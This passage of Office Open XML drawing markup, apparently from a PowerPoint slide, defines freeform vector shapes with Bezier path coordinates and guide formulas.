                    <a:pt x="253" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="160"/>
                    <a:pt x="240" y="192"/>
                    <a:pt x="216" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="239"/>
                    <a:pt x="160" y="252"/>
                    <a:pt x="126" y="252"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="51"/>
                    <a:pt x="87" y="58"/>
                    <a:pt x="73" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="87"/>
                    <a:pt x="51" y="106"/>
                    <a:pt x="51" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="146"/>
                    <a:pt x="59" y="165"/>
                    <a:pt x="73" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="208"/>
                    <a:pt x="151" y="208"/>
                    <a:pt x="180" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="165"/>
                    <a:pt x="202" y="146"/>
                    <a:pt x="202" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="106"/>
                    <a:pt x="194" y="87"/>
                    <a:pt x="180" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="73"/>
                    <a:pt x="180" y="73"/>
                    <a:pt x="180" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="58"/>
                    <a:pt x="147" y="51"/>
                    <a:pt x="12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96" name="Freeform 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013F8452-CA17-4244-B37B-50607F88A1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74263" y="679450"/>
              <a:ext cx="106363" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 265 h 265"/>
                <a:gd name="T2" fmla="*/ 37 w 253"/>
                <a:gd name="T3" fmla="*/ 228 h 265"/>
                <a:gd name="T4" fmla="*/ 0 w 253"/>
                <a:gd name="T5" fmla="*/ 139 h 265"/>
                <a:gd name="T6" fmla="*/ 37 w 253"/>
                <a:gd name="T7" fmla="*/ 50 h 265"/>
                <a:gd name="T8" fmla="*/ 216 w 253"/>
                <a:gd name="T9" fmla="*/ 50 h 265"/>
                <a:gd name="T10" fmla="*/ 253 w 253"/>
                <a:gd name="T11" fmla="*/ 139 h 265"/>
                <a:gd name="T12" fmla="*/ 216 w 253"/>
                <a:gd name="T13" fmla="*/ 228 h 265"/>
                <a:gd name="T14" fmla="*/ 126 w 253"/>
                <a:gd name="T15" fmla="*/ 265 h 265"/>
                <a:gd name="T16" fmla="*/ 126 w 253"/>
                <a:gd name="T17" fmla="*/ 63 h 265"/>
                <a:gd name="T18" fmla="*/ 73 w 253"/>
                <a:gd name="T19" fmla="*/ 85 h 265"/>
                <a:gd name="T20" fmla="*/ 51 w 253"/>
                <a:gd name="T21" fmla="*/ 139 h 265"/>
                <a:gd name="T22" fmla="*/ 73 w 253"/>
                <a:gd name="T23" fmla="*/ 192 h 265"/>
                <a:gd name="T24" fmla="*/ 180 w 253"/>
                <a:gd name="T25" fmla="*/ 192 h 265"/>
                <a:gd name="T26" fmla="*/ 202 w 253"/>
                <a:gd name="T27" fmla="*/ 139 h 265"/>
                <a:gd name="T28" fmla="*/ 180 w 253"/>
                <a:gd name="T29" fmla="*/ 85 h 265"/>
                <a:gd name="T30" fmla="*/ 126 w 253"/>
                <a:gd name="T31" fmla="*/ 6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3" h="265">
                  <a:moveTo>
                    <a:pt x="126" y="265"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="265"/>
                    <a:pt x="62" y="253"/>
                    <a:pt x="37" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="204"/>
                    <a:pt x="0" y="173"/>
                    <a:pt x="0" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="13" y="73"/>
                    <a:pt x="37" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="0"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="216" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="73"/>
                    <a:pt x="253" y="105"/>
                    <a:pt x="253" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="173"/>
                    <a:pt x="239" y="204"/>
                    <a:pt x="216" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="253"/>
                    <a:pt x="159" y="265"/>
                    <a:pt x="126" y="265"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="63"/>
                    <a:pt x="87" y="71"/>
                    <a:pt x="73" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="100"/>
                    <a:pt x="51" y="119"/>
                    <a:pt x="51" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="159"/>
                    <a:pt x="58" y="178"/>
                    <a:pt x="73" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="222"/>
                    <a:pt x="150" y="222"/>
                    <a:pt x="180" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="178"/>
                    <a:pt x="202" y="159"/>
                    <a:pt x="202" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="119"/>
                    <a:pt x="194" y="100"/>
                    <a:pt x="180" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="71"/>
                    <a:pt x="146" y="63"/>
                    <a:pt x="12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97" name="Freeform 109">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F6E7C5-81D1-DB46-A954-34C4AF1A00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232938" y="685800"/>
              <a:ext cx="106363" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 252 h 252"/>
                <a:gd name="T2" fmla="*/ 37 w 253"/>
                <a:gd name="T3" fmla="*/ 215 h 252"/>
                <a:gd name="T4" fmla="*/ 0 w 253"/>
                <a:gd name="T5" fmla="*/ 126 h 252"/>
                <a:gd name="T6" fmla="*/ 37 w 253"/>
                <a:gd name="T7" fmla="*/ 37 h 252"/>
                <a:gd name="T8" fmla="*/ 37 w 253"/>
                <a:gd name="T9" fmla="*/ 37 h 252"/>
                <a:gd name="T10" fmla="*/ 126 w 253"/>
                <a:gd name="T11" fmla="*/ 0 h 252"/>
                <a:gd name="T12" fmla="*/ 216 w 253"/>
                <a:gd name="T13" fmla="*/ 37 h 252"/>
                <a:gd name="T14" fmla="*/ 253 w 253"/>
                <a:gd name="T15" fmla="*/ 126 h 252"/>
                <a:gd name="T16" fmla="*/ 216 w 253"/>
                <a:gd name="T17" fmla="*/ 215 h 252"/>
                <a:gd name="T18" fmla="*/ 126 w 253"/>
                <a:gd name="T19" fmla="*/ 252 h 252"/>
                <a:gd name="T20" fmla="*/ 126 w 253"/>
                <a:gd name="T21" fmla="*/ 50 h 252"/>
                <a:gd name="T22" fmla="*/ 73 w 253"/>
                <a:gd name="T23" fmla="*/ 72 h 252"/>
                <a:gd name="T24" fmla="*/ 73 w 253"/>
                <a:gd name="T25" fmla="*/ 72 h 252"/>
                <a:gd name="T26" fmla="*/ 51 w 253"/>
                <a:gd name="T27" fmla="*/ 126 h 252"/>
                <a:gd name="T28" fmla="*/ 73 w 253"/>
                <a:gd name="T29" fmla="*/ 179 h 252"/>
                <a:gd name="T30" fmla="*/ 180 w 253"/>
                <a:gd name="T31" fmla="*/ 179 h 252"/>
                <a:gd name="T32" fmla="*/ 202 w 253"/>
                <a:gd name="T33" fmla="*/ 126 h 252"/>
                <a:gd name="T34" fmla="*/ 180 w 253"/>
                <a:gd name="T35" fmla="*/ 72 h 252"/>
                <a:gd name="T36" fmla="*/ 126 w 253"/>
                <a:gd name="T37" fmla="*/ 50 h 252"/>
                <a:gd name="T38" fmla="*/ 55 w 253"/>
                <a:gd name="T39" fmla="*/ 55 h 252"/>
                <a:gd name="T40" fmla="*/ 55 w 253"/>
                <a:gd name="T41" fmla="*/ 55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" h="252">
                  <a:moveTo>
                    <a:pt x="126" y="252"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="252"/>
                    <a:pt x="61" y="239"/>
                    <a:pt x="37" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="191"/>
                    <a:pt x="0" y="160"/>
                    <a:pt x="0" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="60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61" y="13"/>
                    <a:pt x="93" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="0"/>
                    <a:pt x="192" y="13"/>
                    <a:pt x="216" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="60"/>
                    <a:pt x="253" y="92"/>
                    <a:pt x="253" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="160"/>
                    <a:pt x="240" y="191"/>
                    <a:pt x="216" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="239"/>
                    <a:pt x="160" y="252"/>
                    <a:pt x="126" y="252"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="50"/>
                    <a:pt x="87" y="58"/>
                    <a:pt x="73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59" y="87"/>
                    <a:pt x="51" y="106"/>
                    <a:pt x="51" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="146"/>
                    <a:pt x="59" y="165"/>
                    <a:pt x="73" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="208"/>
                    <a:pt x="151" y="208"/>
                    <a:pt x="180" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="165"/>
                    <a:pt x="202" y="146"/>
                    <a:pt x="202" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="106"/>
                    <a:pt x="194" y="87"/>
                    <a:pt x="180" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="58"/>
                    <a:pt x="147" y="50"/>
                    <a:pt x="126" y="50"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="55" y="55"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="55"/>
                    <a:pt x="55" y="55"/>
                    <a:pt x="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98" name="Freeform 110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2392F04D-41C0-904D-90E3-41D43E69A5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74263" y="241300"/>
              <a:ext cx="106363" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 264 h 264"/>
                <a:gd name="T2" fmla="*/ 37 w 253"/>
                <a:gd name="T3" fmla="*/ 227 h 264"/>
                <a:gd name="T4" fmla="*/ 0 w 253"/>
                <a:gd name="T5" fmla="*/ 138 h 264"/>
                <a:gd name="T6" fmla="*/ 37 w 253"/>
                <a:gd name="T7" fmla="*/ 49 h 264"/>
                <a:gd name="T8" fmla="*/ 37 w 253"/>
                <a:gd name="T9" fmla="*/ 49 h 264"/>
                <a:gd name="T10" fmla="*/ 37 w 253"/>
                <a:gd name="T11" fmla="*/ 49 h 264"/>
                <a:gd name="T12" fmla="*/ 216 w 253"/>
                <a:gd name="T13" fmla="*/ 49 h 264"/>
                <a:gd name="T14" fmla="*/ 253 w 253"/>
                <a:gd name="T15" fmla="*/ 138 h 264"/>
                <a:gd name="T16" fmla="*/ 216 w 253"/>
                <a:gd name="T17" fmla="*/ 227 h 264"/>
                <a:gd name="T18" fmla="*/ 126 w 253"/>
                <a:gd name="T19" fmla="*/ 264 h 264"/>
                <a:gd name="T20" fmla="*/ 126 w 253"/>
                <a:gd name="T21" fmla="*/ 63 h 264"/>
                <a:gd name="T22" fmla="*/ 73 w 253"/>
                <a:gd name="T23" fmla="*/ 85 h 264"/>
                <a:gd name="T24" fmla="*/ 73 w 253"/>
                <a:gd name="T25" fmla="*/ 85 h 264"/>
                <a:gd name="T26" fmla="*/ 51 w 253"/>
                <a:gd name="T27" fmla="*/ 138 h 264"/>
                <a:gd name="T28" fmla="*/ 73 w 253"/>
                <a:gd name="T29" fmla="*/ 192 h 264"/>
                <a:gd name="T30" fmla="*/ 180 w 253"/>
                <a:gd name="T31" fmla="*/ 192 h 264"/>
                <a:gd name="T32" fmla="*/ 202 w 253"/>
                <a:gd name="T33" fmla="*/ 138 h 264"/>
                <a:gd name="T34" fmla="*/ 180 w 253"/>
                <a:gd name="T35" fmla="*/ 85 h 264"/>
                <a:gd name="T36" fmla="*/ 126 w 253"/>
                <a:gd name="T37" fmla="*/ 63 h 264"/>
                <a:gd name="T38" fmla="*/ 55 w 253"/>
                <a:gd name="T39" fmla="*/ 67 h 264"/>
                <a:gd name="T40" fmla="*/ 55 w 253"/>
                <a:gd name="T41" fmla="*/ 6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" h="264">
                  <a:moveTo>
                    <a:pt x="126" y="264"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="264"/>
                    <a:pt x="62" y="252"/>
                    <a:pt x="37" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="204"/>
                    <a:pt x="0" y="172"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="104"/>
                    <a:pt x="13" y="73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86" y="0"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="216" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="73"/>
                    <a:pt x="253" y="104"/>
                    <a:pt x="253" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="172"/>
                    <a:pt x="239" y="204"/>
                    <a:pt x="216" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="252"/>
                    <a:pt x="159" y="264"/>
                    <a:pt x="126" y="264"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="63"/>
                    <a:pt x="87" y="70"/>
                    <a:pt x="73" y="85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58" y="99"/>
                    <a:pt x="51" y="118"/>
                    <a:pt x="51" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="158"/>
                    <a:pt x="58" y="177"/>
                    <a:pt x="73" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="221"/>
                    <a:pt x="150" y="221"/>
                    <a:pt x="180" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="177"/>
                    <a:pt x="202" y="158"/>
                    <a:pt x="202" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="118"/>
                    <a:pt x="194" y="99"/>
                    <a:pt x="180" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="70"/>
                    <a:pt x="146" y="63"/>
                    <a:pt x="126" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="55" y="67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="67"/>
                    <a:pt x="55" y="67"/>
                    <a:pt x="5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99" name="Freeform 111">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34E86034-8A24-B947-B01C-3BB0144CD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96463" y="239713"/>
              <a:ext cx="20638" cy="69850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 50"/>
                <a:gd name="T1" fmla="*/ 167 h 167"/>
                <a:gd name="T2" fmla="*/ 0 w 50"/>
                <a:gd name="T3" fmla="*/ 141 h 167"/>
                <a:gd name="T4" fmla="*/ 0 w 50"/>
                <a:gd name="T5" fmla="*/ 25 h 167"/>
                <a:gd name="T6" fmla="*/ 25 w 50"/>
                <a:gd name="T7" fmla="*/ 0 h 167"/>
                <a:gd name="T8" fmla="*/ 50 w 50"/>
                <a:gd name="T9" fmla="*/ 25 h 167"/>
                <a:gd name="T10" fmla="*/ 50 w 50"/>
                <a:gd name="T11" fmla="*/ 141 h 167"/>
                <a:gd name="T12" fmla="*/ 25 w 50"/>
                <a:gd name="T1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67">
                  <a:moveTo>
                    <a:pt x="25" y="167"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="167"/>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="14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5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="141"/>
                    <a:pt x="50" y="141"/>
                    <a:pt x="50" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="155"/>
                    <a:pt x="39" y="167"/>
                    <a:pt x="25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00" name="Freeform 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71F258E6-ABCE-8340-A6DA-68B5779CA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96463" y="728663"/>
              <a:ext cx="20638" cy="68263"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 50"/>
                <a:gd name="T1" fmla="*/ 166 h 166"/>
                <a:gd name="T2" fmla="*/ 0 w 50"/>
                <a:gd name="T3" fmla="*/ 141 h 166"/>
                <a:gd name="T4" fmla="*/ 0 w 50"/>
                <a:gd name="T5" fmla="*/ 25 h 166"/>
                <a:gd name="T6" fmla="*/ 25 w 50"/>
                <a:gd name="T7" fmla="*/ 0 h 166"/>
                <a:gd name="T8" fmla="*/ 50 w 50"/>
                <a:gd name="T9" fmla="*/ 25 h 166"/>
                <a:gd name="T10" fmla="*/ 50 w 50"/>
                <a:gd name="T11" fmla="*/ 141 h 166"/>
                <a:gd name="T12" fmla="*/ 25 w 50"/>
                <a:gd name="T13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66">
                  <a:moveTo>
                    <a:pt x="25" y="166"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="166"/>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="14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5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="141"/>
                    <a:pt x="50" y="141"/>
                    <a:pt x="50" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="155"/>
                    <a:pt x="39" y="166"/>
                    <a:pt x="2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01" name="Freeform 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6275FFF4-0F91-384B-B696-35765F393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6588" y="508000"/>
              <a:ext cx="69850" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 141 w 167"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 167"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 167"/>
                <a:gd name="T5" fmla="*/ 26 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 167"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 141 w 167"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 167 w 167"/>
                <a:gd name="T11" fmla="*/ 26 h 51"/>
                <a:gd name="T12" fmla="*/ 141 w 167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1">
                  <a:moveTo>
                    <a:pt x="141" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="51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55" y="0"/>
                    <a:pt x="167" y="12"/>
                    <a:pt x="167" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="40"/>
                    <a:pt x="155" y="51"/>
                    <a:pt x="141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02" name="Freeform 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C7E68C8-16B4-9B44-A499-7A5A9309F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15538" y="508000"/>
              <a:ext cx="71438" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 141 w 167"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 167"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 167"/>
                <a:gd name="T5" fmla="*/ 26 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 167"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 141 w 167"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 167 w 167"/>
                <a:gd name="T11" fmla="*/ 26 h 51"/>
                <a:gd name="T12" fmla="*/ 141 w 167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1">
                  <a:moveTo>
                    <a:pt x="141" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="51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55" y="0"/>
                    <a:pt x="167" y="12"/>
                    <a:pt x="167" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="40"/>
                    <a:pt x="155" y="51"/>
                    <a:pt x="141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03" name="Freeform 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80100FEB-2613-7E46-B450-8DD10AD70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04375" y="317500"/>
              <a:ext cx="58738" cy="55563"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 138"/>
                <a:gd name="T1" fmla="*/ 135 h 135"/>
                <a:gd name="T2" fmla="*/ 92 w 138"/>
                <a:gd name="T3" fmla="*/ 128 h 135"/>
                <a:gd name="T4" fmla="*/ 10 w 138"/>
                <a:gd name="T5" fmla="*/ 45 h 135"/>
                <a:gd name="T6" fmla="*/ 10 w 138"/>
                <a:gd name="T7" fmla="*/ 10 h 135"/>
                <a:gd name="T8" fmla="*/ 46 w 138"/>
                <a:gd name="T9" fmla="*/ 10 h 135"/>
                <a:gd name="T10" fmla="*/ 128 w 138"/>
                <a:gd name="T11" fmla="*/ 92 h 135"/>
                <a:gd name="T12" fmla="*/ 128 w 138"/>
                <a:gd name="T13" fmla="*/ 128 h 135"/>
                <a:gd name="T14" fmla="*/ 110 w 138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135">
                  <a:moveTo>
                    <a:pt x="110" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="135"/>
                    <a:pt x="97" y="133"/>
                    <a:pt x="92" y="128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0" y="36"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="10" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="46" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="92"/>
                    <a:pt x="128" y="92"/>
                    <a:pt x="128" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="102"/>
                    <a:pt x="138" y="118"/>
                    <a:pt x="128" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="133"/>
                    <a:pt x="117" y="135"/>
                    <a:pt x="110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04" name="Freeform 116">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E6B9122-43C4-2A4D-978A-1A6BEBB88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0450" y="661988"/>
              <a:ext cx="58738" cy="57150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 138"/>
                <a:gd name="T1" fmla="*/ 135 h 135"/>
                <a:gd name="T2" fmla="*/ 92 w 138"/>
                <a:gd name="T3" fmla="*/ 127 h 135"/>
                <a:gd name="T4" fmla="*/ 10 w 138"/>
                <a:gd name="T5" fmla="*/ 45 h 135"/>
                <a:gd name="T6" fmla="*/ 10 w 138"/>
                <a:gd name="T7" fmla="*/ 9 h 135"/>
                <a:gd name="T8" fmla="*/ 46 w 138"/>
                <a:gd name="T9" fmla="*/ 9 h 135"/>
                <a:gd name="T10" fmla="*/ 128 w 138"/>
                <a:gd name="T11" fmla="*/ 92 h 135"/>
                <a:gd name="T12" fmla="*/ 128 w 138"/>
                <a:gd name="T13" fmla="*/ 127 h 135"/>
                <a:gd name="T14" fmla="*/ 110 w 138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135">
                  <a:moveTo>
                    <a:pt x="110" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="135"/>
                    <a:pt x="97" y="132"/>
                    <a:pt x="92" y="127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0" y="35"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="10" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="46" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="92"/>
                    <a:pt x="128" y="92"/>
                    <a:pt x="128" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="102"/>
                    <a:pt x="138" y="118"/>
                    <a:pt x="128" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="132"/>
                    <a:pt x="116" y="135"/>
                    <a:pt x="110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05" name="Freeform 117">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D958AFC3-E902-804C-9987-028439088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04375" y="661988"/>
              <a:ext cx="58738" cy="57150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 138"/>
                <a:gd name="T1" fmla="*/ 135 h 135"/>
                <a:gd name="T2" fmla="*/ 10 w 138"/>
                <a:gd name="T3" fmla="*/ 127 h 135"/>
                <a:gd name="T4" fmla="*/ 10 w 138"/>
                <a:gd name="T5" fmla="*/ 92 h 135"/>
                <a:gd name="T6" fmla="*/ 92 w 138"/>
                <a:gd name="T7" fmla="*/ 9 h 135"/>
                <a:gd name="T8" fmla="*/ 128 w 138"/>
                <a:gd name="T9" fmla="*/ 9 h 135"/>
                <a:gd name="T10" fmla="*/ 128 w 138"/>
                <a:gd name="T11" fmla="*/ 45 h 135"/>
                <a:gd name="T12" fmla="*/ 46 w 138"/>
                <a:gd name="T13" fmla="*/ 127 h 135"/>
                <a:gd name="T14" fmla="*/ 28 w 138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135">
                  <a:moveTo>
                    <a:pt x="28" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="135"/>
                    <a:pt x="15" y="132"/>
                    <a:pt x="10" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="118"/>
                    <a:pt x="0" y="102"/>
                    <a:pt x="10" y="92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102" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="128" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="19"/>
